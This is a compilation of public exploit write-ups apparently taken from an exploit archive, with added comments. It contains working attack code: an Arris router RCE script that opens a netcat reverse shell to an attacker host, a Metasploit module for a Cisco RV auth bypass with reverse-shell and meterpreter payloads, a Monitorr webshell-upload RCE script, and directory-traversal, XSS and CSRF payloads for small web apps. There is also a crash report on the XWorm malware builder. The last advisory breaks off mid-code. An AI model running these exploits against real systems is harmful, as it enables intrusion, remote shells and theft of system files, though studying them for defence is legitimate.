<pre><code>c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 17/11/2022<br /># Exploit Author: Yerodin Richards<br /># Vendor Homepage: https://www.commscope.com/<br /># Version: 9.1.103<br /># Tested on: TG2482A, TG2492, SBG10<br /># CVE : CVE-2022-45701<br /><br />import requests<br />import base64<br /><br /># Proof-of-concept configuration. The title marks this as an authenticated issue:<br /># every request below carries a credential obtained from /login first, so knowing the<br /># router's admin password (the default pair is hard-coded here) is a precondition.<br />router_host = "http://192.168.0.1"<br />username = "admin"<br />password = "password"<br /><br />lhost = "192.168.0.6"<br />lport = 80<br /><br /><br />def main():<br /> # Flow: log in, build the OID value, write it through /snmpSet.<br /> print("Authorizing...")<br /> cookie = get_cookie(gen_header(username, password))<br /> # Only an empty body counts as a failed login; any other body (for example an<br /> # error page) is used as the credential cookie as-is.<br /> if cookie == '':<br /> print("Failed to authorize")<br /> exit(-1)<br /> print("Generating Payload...")<br /> payload = gen_payload(lhost, lport)<br /> print("Sending Payload...")<br /> send_payload(payload, cookie)<br /> print("Done, check shell..")<br /><br /># Returns base64("u:p") as ASCII; passed to /login as the 'arg' query parameter.<br />def gen_header(u, p):<br /> return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")<br /><br /># Joins params as k=v&k=v WITHOUT URL-encoding (presumably so that the '$', '('<br /># and ';' characters in the oid value reach the router verbatim).<br />def no_encode_params(params):<br /> return "&".join("%s=%s" % (k,v) for k,v in params.items())<br /><br /># GET /login with arg=BASE64CREDS and _n=1; the response body is the session credential.<br />def get_cookie(header):<br /> url = router_host+"/login"<br /> params = no_encode_params({"arg":header, "_n":1})<br /> resp=requests.get(url, params=params)<br /> return resp.content.decode('UTF-8')<br /><br /># GET /snmpSet with oid=OID=VALUE;TYPE; and the 'credential' cookie. The response is<br /># discarded. Detection note: an authenticated /snmpSet request whose oid parameter<br /># contains shell metacharacters ('$(' below) is the observable indicator of this issue.<br />def set_oid(oid, cookie):<br /> url = router_host+"/snmpSet"<br /> params = no_encode_params({"oid":oid, "_n":1})<br /> cookies = {"credential":cookie}<br /> requests.get(url, params=params, cookies=cookies)<br /><br /># The value written to ...7.2.0 is a shell command-substitution; the device presumably<br /># hands this OID value to a shell without escaping (CVE-2022-45701).<br />def gen_payload(h, p):<br /> return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"<br /><br /># Writes the payload under the 1.3.6.1.4.1.4115.1.20.1.1.7 subtree; the final set<br /># (...7.9.0=1) presumably applies the configuration and triggers execution - confirm<br /># against the firmware. None of the set_oid responses are checked.<br />def send_payload(payload, cookie):<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)<br /> set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)<br /> set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)<br /> 
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)<br /> <br /><br />if __name__ == '__main__':<br /> main()<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> # Module metadata: two chained CVEs on Cisco RV-series routers. The two 'Targets'<br /> # differ only in payload type (raw unix command vs. ARM dropper staged over<br /> # wget/curl); BadChars excludes the quote and '#' that send_exploit itself uses.<br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',<br /> 'Description' => %q{<br /> This module exploits two vulnerabilities, a session ID directory traversal authentication<br /> bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,<br /> and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.<br /> This access can then be used to pivot to other parts of the network. 
This module works on firmware<br /> versions 1.0.03.24 and below.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['linux', 'unix'],<br /> 'Author' => [<br /> 'Biem Pham', # Vulnerability Discoveries<br /> 'Neterum', # Metasploit Module<br /> 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb<br /> ],<br /> 'DisclosureDate' => '2021-11-02',<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'References' => [<br /> ['CVE', '2022-20705'], # Authentication Bypass<br /> ['CVE', '2022-20707'], # Command Injection<br /> ['ZDI', '22-410'], # Authentication Bypass<br /> ['ZDI', '22-411'] # Command Injection<br /> ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => {<br /> 'BadChars' => '\'#'<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'Payload' => {<br /> 'BadChars' => '\'#'<br /> },<br /> 'CmdStagerFlavor' => [ 'wget', 'curl' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ]<br /> )<br /> end<br /><br /> # sessionid utilized later needs to be set to length<br /> # of 16 or exploit will fail. 
Tested with lengths<br /> # 14-17<br /> # (16 is what the code actually uses; the 14-17 range is the author's testing note.)<br /> def generate_session_id<br /> return Rex::Text.rand_text_alphanumeric(16)<br /> end<br /><br /> # Unauthenticated vulnerability check. Detection note for defenders: the bypass is<br /> # visible in web-server logs as a Cookie header containing "sessionid =../" (the<br /> # space before '=' presumably keeps the traversal cookie distinct from the real<br /> # sessionid cookie - confirm against the device's cookie parser).<br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/upload',<br /> 'headers' => {<br /> 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id<br /> }<br /> }, 10)<br /><br /> # A proper "upload" will trigger file creation. So the send_request_cgi call<br /> # above is an incorrect "upload" call to avoid creating a file on disk. The router will return<br /> # status code 405 Not Allowed if authentication has been bypassed by the above request.<br /> # The firmware containing this authentication bypass also contains the command injection<br /> # vulnerability that will be abused during actual exploitation. Non-vulnerable<br /> # firmware versions will respond with 403 Forbidden.<br /> if res.nil?<br /> return CheckCode::Unknown('The device did not respond to request packet.')<br /> elsif res.code == 405<br /> return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')<br /> elsif res.code == 403<br /> return CheckCode::Safe('The device is not vulnerable to exploitation.')<br /> else # Catch-all<br /> return CheckCode::Unknown('The target responded in an unexpected way. 
Exploitation is unlikely.')<br /> end<br /> end<br /><br /> # Sends one command via send_exploit and interprets the reply per target type.<br /> # _opts is presumably part of the CmdStager callback signature and is unused here.<br /> def execute_command(cmd, _opts = {})<br /> res = send_exploit(cmd)<br /><br /> # Successful unix_cmd shells should not produce a response.<br /> # However if a response is returned, check the status code and return<br /> # Failure::NotVulnerable if it is 403 Forbidden.<br /> if target['Type'] == :unix_cmd && res&.code == 403<br /> fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')<br /> end<br /><br /> if target['Type'] == :linux_dropper<br /> fail_with(Failure::Unreachable, 'The target did not respond') unless res<br /> fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200<br /> begin<br /> body_json = res.get_json_document<br /> fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json<br /> rescue JSON::ParserError => e<br /> print_error("Failed: #{e.class} - #{e.message}")<br /> fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')<br /> end<br /> end<br /><br /> print_good('Exploit successfully executed.')<br /> end<br /><br /> # Builds and POSTs the multipart /upload request. The command travels in the<br /> # 'destination' field (quote, command, '#'); a multipart POST to /upload whose<br /> # destination value starts with a quote is the request-level indicator, together<br /> # with the same "sessionid =../" cookie used by check.<br /> def send_exploit(cmd)<br /> filename = Rex::Text.rand_text_alphanumeric(5..12)<br /> fileparam = Rex::Text.rand_text_alphanumeric(5..12)<br /> input = Rex::Text.rand_text_alphanumeric(5..12)<br /><br /> # sessionid utilized later needs to be set to length<br /> # of 16 or exploit will fail. 
Tested with lengths<br /> # 14-17<br /> sessionid = Rex::Text.rand_text_alphanumeric(16)<br /><br /> filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.<br /> pathparam = 'Configuration'<br /><br /> destination = "'; " + cmd + ' #'<br /><br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')<br /> multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')<br /> multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')<br /> multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')<br /> multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')<br /> multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))<br /><br /> # Escaping "/tmp/upload/" folder that does not contain any other permanent files<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => '/upload',<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'headers' => {<br /> 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid<br /> },<br /> 'data' => multipart_form.to_s<br /> }, 10)<br /> end<br /><br /> # Entry point: dispatches on the selected target's Type.<br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager(linemax: 120)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Author: TOUHAMI KASBAOUI<br /># Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/<br /># Software Link: N/A<br /># Version: 2.1<br /># Tested on: Windows 10<br /># CVE : N/A<br /><br />==================================================================<br />THE BUG : NULL pointer dereference -> DOS crash<br />==================================================================<br />The XWorm Trojan is actively used by EvilCoder, who bundle features such as ransomware and keylogging into it to make it more dangerous for victims. The Trojan distributed to victims suffers from a NULL pointer dereference vulnerability, which could lead to a denial of service against the threat actor's builder/server once its command-and-control IP address and port are known.<br />==================================================================<br />WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES<br />==================================================================<br />(160.b98): Access violation - code c0000005 (first chance)<br />First chance exceptions are reported before any exception handling.<br />This exception may be expected and handled.<br />eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c<br />eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />builder!XWorm.Client.isDisconnected+0xa9:<br />078f5a59 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />MethodDesc: 055a86b4<br />Method Name: XWorm.Client.isDisconnected()<br />Class: 09fe9634<br />MethodTable: 055a86d8<br />mdToken: 06000730<br />Module: 01464044<br />IsJitted: yes<br />CodeAddr: 
078f59b0<br />Transparency: Critical<br />MethodDesc: 055a86b4<br />Method Name: XWorm.Client.isDisconnected()<br />Class: 09fe9634<br />MethodTable: 055a86d8<br />mdToken: 06000730<br />Module: 01464044<br />IsJitted: yes<br />CodeAddr: 078f59b0<br />Transparency: Critical<br />Failed to request MethodData, not in JIT code range<br /><br />KEY_VALUES_STRING: 1<br /><br /> Key : AV.Dereference<br /> Value: NullPtr<br /><br /> Key : AV.Fault<br /> Value: Read<br /><br /> Key : Analysis.CPU.mSec<br /> Value: 6406<br /><br /> Key : Analysis.DebugAnalysisManager<br /> Value: Create<br /><br /> Key : Analysis.Elapsed.mSec<br /> Value: 12344<br /><br /> Key : Analysis.IO.Other.Mb<br /> Value: 152<br /><br /> Key : Analysis.IO.Read.Mb<br /> Value: 3<br /><br /> Key : Analysis.IO.Write.Mb<br /> Value: 181<br /><br /> Key : Analysis.Init.CPU.mSec<br /> Value: 48905<br /><br /> Key : Analysis.Init.Elapsed.mSec<br /> Value: 6346579<br /><br /> Key : Analysis.Memory.CommitPeak.Mb<br /> Value: 200<br /><br /> Key : CLR.BuiltBy<br /> Value: NET48REL1LAST_C<br /><br /> Key : CLR.Engine<br /> Value: CLR<br /><br /> Key : CLR.Version<br /> Value: 4.8.4515.0<br /><br /> Key : Timeline.OS.Boot.DeltaSec<br /> Value: 7496<br /><br /> Key : Timeline.Process.Start.DeltaSec<br /> Value: 6371<br /><br /> Key : WER.OS.Branch<br /> Value: vb_release<br /><br /> Key : WER.OS.Timestamp<br /> Value: 2019-12-06T14:06:00Z<br /><br /> Key : WER.OS.Version<br /> Value: 10.0.19041.1<br /><br /> Key : WER.Process.Version<br /> Value: 2.1.0.0<br /><br /><br />NTGLOBALFLAG: 0<br /><br />PROCESS_BAM_CURRENT_THROTTLED: 0<br /><br />PROCESS_BAM_PREVIOUS_THROTTLED: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />EXCEPTION_RECORD: (.exr -1)<br />ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 00000000<br />Attempt to read 
from address 00000000<br /><br />FAULTING_THREAD: 00000b98<br /><br />PROCESS_NAME: builder.exe<br /><br />READ_ADDRESS: 00000000 <br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE_STR: c0000005<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 00000000<br /><br />IP_ON_HEAP: 078f5a59<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />STACK_TEXT: <br />0113e568 73140556 00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9<br />0113e574 7314373a 0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34<br />0113e5c8 7321f0d1 c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b<br />0113e608 7321f1d6 731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55<br />0113e90c 7212853c 00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838<br />0113e930 72114a9d 00000000 00000000 00000000 mscorlib_ni!<br />0113e94c 6e14bf55 00000000 00000000 00000000 mscorlib_ni!<br />0113e968 6e14be68 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113e990 72118604 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113e9f4 72118537 00000000 00000000 00000000 mscorlib_ni!<br />0113ea08 721184f4 00000000 00000000 00000000 mscorlib_ni!<br />0113ea24 6e14bdfa 00000000 00000000 00000000 mscorlib_ni!<br />0113ea40 6e14bb9a 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ea80 6e13b07f 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eacc 6e144931 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ead8 6e1445f7 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eaec 6e13af53 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eaf4 6e13aee5 00000000 00000000 00000000 
System_Windows_Forms_ni!<br />0113eb08 6e13a820 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113eb58 0146d08e 00000000 00000000 00000000 System_Windows_Forms_ni!<br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />0113eb8c 7650148b 000606f4 0000c250 00000000 0x146d08e<br />0113ebb8 764f844a 05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b<br />0113ec9c 764f61ba 05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a<br />0113ed10 764f5f80 0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a<br />0113ed1c 6e19e5ed 0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10<br />0113ed58 6e14b44f 00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed<br />0113eddc 6e14b03d 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ee30 6e14ae93 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ee5c 014b2694 00000000 00000000 00000000 System_Windows_Forms_ni!<br />0113ee84 014b2211 00000000 00000000 00000000 0x14b2694<br />0113eeac 014b1871 00000000 00000000 00000000 0x14b2211<br />0113eef8 014b08b7 00000000 00000000 00000000 0x14b1871<br />0113ef28 73140556 00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f<br />0113ef34 7314373a 0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34<br />0113ef88 73149adb 00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b<br />0113eff0 732bff7b 0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a<br />0113f114 732c065a 0113f158 00000000 c8874096 clr!RunMain+0x1b3<br />0113f380 732c0587 00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7<br />0113f864 732c0708 c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef<br />0113f8bc 732c082e c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c<br />0113f8fc 732bc235 c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc<br />0113f938 7398fa84 84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d<br />0113f970 73a1e81e 73a24330 
73980000 0113f998 mscoreei!_CorExeMain+0xd6<br />0113f980 73a24338 73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e<br />0113f998 76b600f9 00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8<br />0113f998 77997bbe 00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19<br />0113f9f4 77997b8e ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0113fa04 00000000 00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br /><br />STACK_COMMAND: ~0s ; .cxr ; kb<br /><br />SYMBOL_NAME: builder!XWorm.Client.isDisconnected+a9<br /><br />MODULE_NAME: builder<br /><br />IMAGE_NAME: builder.exe<br /><br />FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected<br /><br />OS_VERSION: 10.0.19041.1<br /><br />BUILDLAB_STR: vb_release<br /><br />OSPLATFORM_TYPE: x86<br /><br />OSNAME: Windows 10<br /><br />IMAGE_VERSION: 2.1.0.0<br /><br />FAILURE_ID_HASH: {ab0d02c5-881b-c628-2858-a241c5c41b1f}<br /><br />Followup: MachineOwner<br />---------<br /><br />TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ChiKoi version 1.0 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0 |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Affected files : index.php & admin.php (the 'action' GET parameter is concatenated into the require() path without validation, see below)<br /><br /><!--<br /> Developed by: TanHongIT<br /> Website: https://tanhongit.com - https://tanhongit.net<br /> Github: https://github.com/TanHongIT<br />--><br /><?php<br />session_start();<br />require_once('lib/model.php');<br />require_once('lib/functions.php');<br />require_once('content/models/cart.php');<br />require "lib/statistics.php";<br />require "lib/counter.php";<br />// $count_file = 'logs/counter.txt';<br />// $ip_file = 'logs/ip.txt';<br />// function counting_ip()<br />// {<br />// $ip = $_SERVER['REMOTE_ADDR'];<br />// global $count_file, $ip_file;<br /><br />// if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {<br />// $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;<br />// file_put_contents($ip_file, $ip . "\n", FILE_APPEND);<br />// file_put_contents($count_file, ++$current_val);<br />// }<br />// }<br />// counting_ip();<br />if (isset($_GET['controller'])) $controller = $_GET['controller'];<br />else $controller = 'home';<br />if (isset($_GET['action'])) $action = $_GET['action'];<br />else $action = 'index';<br />$file = 'content/controllers/' . $controller . '/' . $action . 
'.php';<br />if (file_exists($file)) {<br /> require($file);<br />} else {<br /> show_404();<br />}<br /><br /><br />[+] use payload : ../../../../../../../../../etc/passwd<br /><br />[+] https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd<br /><br />[+] https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd<br /><br /><br />== Greetings to :===========================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ChiKoi version 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0 |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Register a new account, open the member control panel, choose to edit the member profile, put the payload in the name field and save the changes.<br /><br />[+] Use Payload : <script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/chikoiquan.tanhongitcom/<br /> <br />== Greetings to :===========================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code># Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 09, 2023<br /># Vendor Homepage: https://github.com/Monitorr/<br /># Software Link: https://github.com/Monitorr/Monitorr<br /># Tested on: Ubuntu<br /># Version: v1.7.6<br /># Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability<br /># CVE: CVE-2020-28871<br /><br />import requests<br />import random<br />import string<br />#from requests.auth import HTTPBasicAuth<br /># colorama is a third-party dependency (terminal colours only, not needed for the requests).<br />from colorama import (Fore as F, Back as B, Style as S)<br />BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT<br /><br /># Posts a PHP file (with a GIF87a prefix) to the upload endpoint, then fetches it back<br /># from the image directory and prints whatever the server returns. 'url' and 'cmd' are<br /># module globals assigned in __main__ below; the upload response (tf1) is never checked.<br /># Detection note: a POST to /assets/php/upload.php with no session, followed by a GET<br /># for a .php name under /assets/data/usrimg/, is the indicator. The GIF87a prefix is<br /># presumably there to pass an image-type check in upload.php - confirm against the source.<br />def payL():<br /> fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'<br /> tf1=requests.post(url+'/assets/php/upload.php',<br /> files=(<br /> ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),))<br /> tf2=requests.get(url+'/assets/data/usrimg/'+fileName)<br /><br /> print(tf2.text)<br /><br /># Returns the coloured ASCII-art banner printed at startup.<br />def sig():<br /> SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+"\n"<br /> SIG += FY+" | .. >||__-__-_| \n"<br /> SIG += FY+" "+FR+"| |.' 
,||_______ "+FY+"\n"<br /> SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" \n"<br /> SIG += FY+" | |\ \ ||__-__-_\n"<br /> SIG += FY+" "+FR+"|___ \_ \||_______| "+FY+"\n"<br /> SIG += FY+"\n"+" _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST<br /> return SIG<br /><br /># Returns the one-line tool description shown under the banner.<br />def argsetup():<br /> about = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST<br /> return about<br /><br />if __name__ == "__main__":<br /> header = SB+FT+"\n"+' '+FR+'retrymp3\n'+ST<br /> print(header)<br /> print(sig())<br /> print(argsetup())<br /> #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}<br /> # Both inputs are read as globals used by payL(); the base url is used as-is (no scheme check).<br /> url=input("Enter the base url: ")<br /> cmd=input("Command: ")<br /> payL()<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WEBY v.1.2.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(32-bit) | <br />| # Vendor : https://ทําเว็บหาดใหญ่.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />The infected file is the /user.php<br /><br />Inside the folder /admin/user/<br /><br />Line 46 we note that it used the variable (_GET $).<br /><br />When using method="get" in HTML forms, all names and values within the <input> tag will appear on the browser's URL.<br /><br />Remark :<br /><br />Use this method when sending important data such as a password or other sensitive information. <br />A bookmark can be used to mark the page, which can be useful in some cases.<br />The method you get is suitable when sending large amounts of data.<br /><br />There are two properties that the <form> element must have for it to function:<br /><br />- action property: Contains the link to the page you will go to when you click the submit button.<br />- method: Defines how to send the data entered in the form, and it has two methods, GET and POST.<br /><br />This data is usually sent to the host (Server) where it is stored. <br />This data is processed using programming languages that run on the host such as PHP<br />So the form consists of a set of fields that work together to accomplish a specific function. <br />For example, the login form on almost all sites consists of three fields:<br />Name or email field. 
<input type="text"> or <input type="email">.<br />The password input field <input type="password">.<br />Submit button <input value="submit" type="submit">.<br /><br />The three fields must be present within one form <form action="/?Action=add" method="POST">, and in the same way you can build any other form.<br /><br />We go to line 95:<br /><br /><form action="?Action=add" role="form" method="post" enctype='multipart/form-data'><br /><br />The method attribute specifies how the data entered in the form is sent, i.e. the HTTP method used to send the data (GET or POST).<br />The action attribute specifies where the data goes when the user clicks the submit button.<br /><br />The action that takes place is to send the data entered in the form to the same file on the host (server).<br /><br />Line 80 uses the $strSQL variable to query the database; the POST fields are concatenated straight into the SQL string, so a forged request stores attacker-chosen values:<br /><br />$strSQL .="('".$_POST["user"]."','".$_POST["pass"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["address"]."','".$_FILES["filUpload"]["name"]."') ";<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : /admin/user/user.php?Action=plus <=== add new admin<br /><br />[+] Use Payload : /admin/user/user.php?Action=show <=== show new admin<br /><br />[+] http://127.0.0.1/WEBY/admin/user/user.php?Action=plus<br /><br />[+] Copy the code below and paste it into an HTML file.<br /><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br /><link rel="stylesheet" type="text/css" href="http://haji-zowzow.com/admin/menu/main.css" /><br /><title>Setting User</title><br /></head><br /><br /><link rel="import" href="http://haji-zowzow.com/include/core-icon.html" /><br /><link rel="import" href="http://haji-zowzow.com/include/paper-ripple.html" /><br /><script src="http://haji-zowzow.com/js/txt.js"></script><br /> <!-- ลบ ถามก่อน --><br /><script type="text/javascript"><br /> function chkdel(){<br 
